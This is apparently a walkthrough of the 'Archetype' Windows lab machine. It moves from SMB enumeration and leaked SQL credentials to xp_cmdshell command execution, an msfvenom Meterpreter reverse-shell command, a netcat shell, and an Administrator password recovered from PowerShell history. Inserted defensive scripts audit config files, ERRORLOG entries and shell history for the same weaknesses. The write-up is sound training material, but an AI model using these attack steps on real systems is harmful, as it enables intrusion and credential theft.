Hello everyone, I hope you are doing well. In this post I will be sharing my walkthrough of the “Very Easy” Windows machine Archetype. The user part of this machine was fun: you need to enumerate for MSSQL credentials, use those to get RCE working through the database, leverage that into a reverse shell, and then it is all about finding the credentials for Administrator.

So let’s start by running an nmap scan on the machine


PORT     STATE SERVICE      VERSION                                       
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-05-09T05:37:36
| Not valid after: 2051-05-09T05:37:36
| MD5: dd26 d0f2 bf23 57ec 693e 11af 7fe6 51f3
|_SHA-1: be4f 58af 20c9 c656 7ae4 4c6a bbfe 1ae2 6ce8 7f16
|_ssl-date: 2021-05-09T05:48:20+00:00; +18m07s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

From the scan we can see that the SMB service is running, so we can check whether we are allowed to access shares as an anonymous user

PORT 139/445 (SMB)

Here we can see that we can read the backups share, so let's connect to it

Download the file using the get prod.dtsConfig command

On reading the file we can see there’s a password for the sql_svc service account
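The lesson for defenders here is that SSIS package configuration files (.dtsConfig) carry connection strings, and a connection string with Password= in it is a cleartext credential sitting in whatever share the backup landed on. The following is an added example, not code from the original post or from the machine: a small audit script that parses a constructed sample .dtsConfig (the values are made up; this is not the contents of prod.dtsConfig), flags every connection string with an embedded password, and reports it with the secret redacted so the report itself does not become another leak. The SSIS element names (Configuration, Path, ConfiguredValue) are the ones SSIS writes; the file name and sample values are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of an SSIS configuration file. The element layout mirrors
# what SSIS writes; the server, user and password values are made up.
SAMPLE_DTSCONFIG = """<?xml version="1.0"?>
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="example" GeneratedFromPackageName="Example" />
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=ExamplePass123!;User ID=svc_example;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Staging;Provider=SQLNCLI10.1;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Connection-string keys that hold a secret.
SECRET_KEYS = ("password", "pwd")


def parse_connection_string(value):
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys."""
    parts = {}
    for item in value.split(";"):
        if "=" not in item:
            continue
        key, _, val = item.partition("=")
        parts[key.strip().lower()] = val.strip()
    return parts


def redact_connection_string(value):
    """Replace the value of any Password=/Pwd= pair with *** for safe reporting."""
    return re.sub(r"(?i)\b(password|pwd)=[^;]*", r"\1=***", value)


def find_embedded_credentials(xml_text):
    """Return one finding per connection string that carries a cleartext password."""
    findings = []
    root = ET.fromstring(xml_text)
    for conf in root.iter("Configuration"):
        path = conf.get("Path", "")
        if "ConnectionString" not in path:
            continue  # only connection-string properties can hold a password
        node = conf.find("ConfiguredValue")
        if node is None or not node.text:
            continue
        parts = parse_connection_string(node.text)
        secret_key = next((k for k in SECRET_KEYS if parts.get(k)), None)
        if secret_key is None:
            continue  # integrated security or no password: nothing leaked
        findings.append({
            "path": path,
            "user": parts.get("user id", parts.get("uid", "<none>")),
            "password_length": len(parts[secret_key]),
            # Persist Security Info=True keeps the password in the open
            # connection object, which widens the exposure further.
            "persist_security_info": parts.get("persist security info", "").lower() == "true",
            "redacted": redact_connection_string(node.text),
        })
    return findings


if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_DTSCONFIG):
        print(f"{f['path']}: user={f['user']} password_length={f['password_length']} "
              f"persist_security_info={f['persist_security_info']}")
        print("  " + f["redacted"])
```

In practice you would point find_embedded_credentials at every .dtsConfig found under a backup or file share and treat each finding as a credential to rotate, then move the package to integrated authentication or an encrypted configuration so the password never lands in the file at all.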

Let’s verify it with crackmapexec

And it seems the credentials are valid, so I am going to use sqsh, which is an open-source interactive database shell

Now, to execute Windows commands, we are going to use xp_cmdshell, which spawns a Windows command shell. xp_cmdshell is an extended stored procedure provided by Microsoft and stored in the master database. So the whole command will be

EXEC master..xp_cmdshell 'whoami'

Here EXEC is used to execute a stored procedure on a database; stored procedures are kind of like functions in MySQL/MSSQL.
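From the defender's side, xp_cmdshell is disabled by default and has to be switched on with sp_configure before it can run anything, and that switch leaves a trace: SQL Server writes a "Configuration option 'xp_cmdshell' changed from 0 to 1" line to its ERRORLOG. The following is an added example, not code from the original post: a detector that parses a constructed ERRORLOG excerpt (the hostnames, user and address are made up), raises an alert whenever xp_cmdshell or Ole Automation Procedures is enabled, and also surfaces successful SQL-authenticated logins from remote clients so the two events can be correlated. Note that successful-login lines only appear when the instance's login auditing is set to log both failed and successful logins (the default logs failures only); the rule severities are my own assumption. Turning the procedure back off is a matter of EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;.

```python
import re

# Constructed excerpt of a SQL Server ERRORLOG (timestamp, source, message),
# written in the engine's own layout; names and addresses are made up.
SAMPLE_ERRORLOG = """\
2021-05-09 05:39:58.00 Logon       Login succeeded for user 'svc_example'. Connection made using SQL Server authentication. [CLIENT: 192.0.2.10]
2021-05-09 05:40:01.10 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-05-09 05:40:01.12 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-05-09 05:41:30.55 spid51      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2021-05-09 05:42:00.00 spid10s     SQL Server is now ready for client connections. This is an informational message; no user action is required.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<source>\S+)\s+(?P<msg>.*)$")
CONFIG_RE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")
LOGIN_RE = re.compile(
    r"Login succeeded for user '(?P<user>[^']+)'\. Connection made using "
    r"(?P<auth>[^.]+)\. \[CLIENT: (?P<client>[^\]]+)\]")

# sp_configure options worth alerting on when enabled (severity is an assumption).
WATCHED_OPTIONS = {
    "xp_cmdshell": "high",
    "Ole Automation Procedures": "high",
    "show advanced options": "low",   # prerequisite step for the two above
}
LOCAL_CLIENTS = {"<local machine>", "127.0.0.1", "::1"}


def parse_errorlog(text):
    """Yield dicts with ts/source/msg for every well-formed ERRORLOG line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def detect(text):
    """Return alerts for watched options being enabled and remote SQL logins."""
    alerts = []
    for ev in parse_errorlog(text):
        cfg = CONFIG_RE.search(ev["msg"])
        if cfg:
            option = cfg["option"]
            if option in WATCHED_OPTIONS and cfg["new"] != "0":
                alerts.append({
                    "time": ev["ts"],
                    "severity": WATCHED_OPTIONS[option],
                    "what": f"{option} enabled ({cfg['old']} -> {cfg['new']})",
                })
            continue
        login = LOGIN_RE.search(ev["msg"])
        if login and login["auth"].startswith("SQL Server authentication") \
                and login["client"] not in LOCAL_CLIENTS:
            alerts.append({
                "time": ev["ts"],
                "severity": "info",
                "what": f"SQL login '{login['user']}' from {login['client']}",
            })
    return alerts


def xp_cmdshell_enabled_at_end(text):
    """Replay the config changes and report whether xp_cmdshell was left on."""
    enabled = False
    for ev in parse_errorlog(text):
        cfg = CONFIG_RE.search(ev["msg"])
        if cfg and cfg["option"] == "xp_cmdshell":
            enabled = cfg["new"] != "0"
    return enabled


if __name__ == "__main__":
    for a in detect(SAMPLE_ERRORLOG):
        print(f"{a['time']} [{a['severity']}] {a['what']}")
    print("xp_cmdshell left enabled:", xp_cmdshell_enabled_at_end(SAMPLE_ERRORLOG))
```

The interesting signal is the sequence: a remote SQL-authenticated login followed within seconds by 'show advanced options' and 'xp_cmdshell' flipping to 1 is exactly what a service account being used from a database shell looks like, and it is visible without any extra tooling beyond the ERRORLOG the engine already writes.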

Perfect. Now we need to know our current location in the file system so we can upload our payload and get a proper shell

Right now we are in the system32 folder, where we don't have permissions to read and write, so we need to save our payload in a directory where we are allowed to

This looks like the directory for the service account (the user in this case), since it has its own home directory

Generate a Windows 64-bit Meterpreter payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=2222 -f exe > shell.exe

Now host this on the local machine using python3

And download it like this

But whenever I tried to execute the payload it would get deleted, so there are some scheduled tasks or scripts running in the background and it can't be done like this. I also tried uploading a PowerShell script and executing it, but that was blocked as well.

So the only option left was to upload a 64-bit netcat executable

Then simply run the executable

Running whoami /all we can see our privileges on the machine

I tried to use the PrintSpoofer exploit but it failed

At this point I took a hint for the escalation, because everything was failing and the box wasn’t meant to be exploited like that. I was told to find the password for the Administrator account by looking at PowerShell’s history; we can find the path by running the command “Get-PSReadLineOption”, which shows the path to the PowerShell history file.
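The root cause on the defender's side is that PSReadLine records every interactive command, so a password typed inline (net use with /user:... password, ConvertTo-SecureString 'literal' -AsPlainText, and so on) is saved to disk in cleartext for anyone who can read that user's profile. The following is an added example, not code from the original post: a scanner for the history file that flags lines carrying a literal credential, skips values that are only variable references, and reports each hit with the secret masked. The sample history lines are constructed (they are not the ones found on the machine) and the default file location in default_history_path is the PSReadLine default, an assumption; on a live host the path reported by Get-PSReadLineOption (its HistorySavePath property) is the one to use.

```python
import os
import re

# Constructed PowerShell history lines; hosts, users and passwords are made up.
SAMPLE_HISTORY = [
    r"Get-ChildItem C:\Users",
    r"net.exe use T: \\EXAMPLE-HOST\backups /user:EXAMPLE\svc_example ExamplePass123!",
    r"$pw = ConvertTo-SecureString 'ExamplePass123!' -AsPlainText -Force",
    r"New-LocalUser helper -Password $pw",
    r"Get-Process | Where-Object CPU -gt 10",
]

# Each rule's regex has a group named "secret" covering the value to mask.
RULES = [
    ("net use with inline password",
     re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:\S+\s+(?P<secret>\S+)", re.IGNORECASE)),
    ("ConvertTo-SecureString -AsPlainText literal",
     re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?(?P<secret>\S+).*-AsPlainText", re.IGNORECASE)),
    ("-Password argument",
     re.compile(r"-Password\s+(?P<secret>\S+)", re.IGNORECASE)),
    ("password=value assignment",
     re.compile(r"\bpass(?:word|wd)?\s*[:=]\s*(?P<secret>\S+)", re.IGNORECASE)),
]


def scan_history_lines(lines):
    """Return one finding per history line that contains a literal credential."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for name, rule in RULES:
            m = rule.search(line)
            if not m:
                continue
            secret = m.group("secret")
            if secret.startswith("$"):
                continue  # a variable reference such as $pw, not a literal
            masked = line[:m.start("secret")] + "***" + line[m.end("secret"):]
            findings.append({"line": number, "rule": name, "masked": masked.strip()})
            break  # one finding per line is enough for a report
    return findings


def default_history_path():
    """PSReadLine's default history location on Windows (assumption: default
    settings; Get-PSReadLineOption reports the real path on a given host)."""
    appdata = os.environ.get("APPDATA", r"C:\Users\<user>\AppData\Roaming")
    return os.path.join(appdata, "Microsoft", "Windows", "PowerShell",
                        "PSReadLine", "ConsoleHost_history.txt")


def scan_history_file(path):
    """Scan a history file on disk; unreadable bytes are replaced, not fatal."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_history_lines(fh.read().splitlines())


if __name__ == "__main__":
    for f in scan_history_lines(SAMPLE_HISTORY):
        print(f"line {f['line']} [{f['rule']}]: {f['masked']}")
```

Run scan_history_file(default_history_path()) for each profile on a host to find credentials that need rotating; the longer-term fix is to stop passing secrets inline (Get-Credential or a credential store instead) and to clear or disable history saving for accounts that administer sensitive systems.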

Since the WinRM port (5985) is open, we can log in remotely using these credentials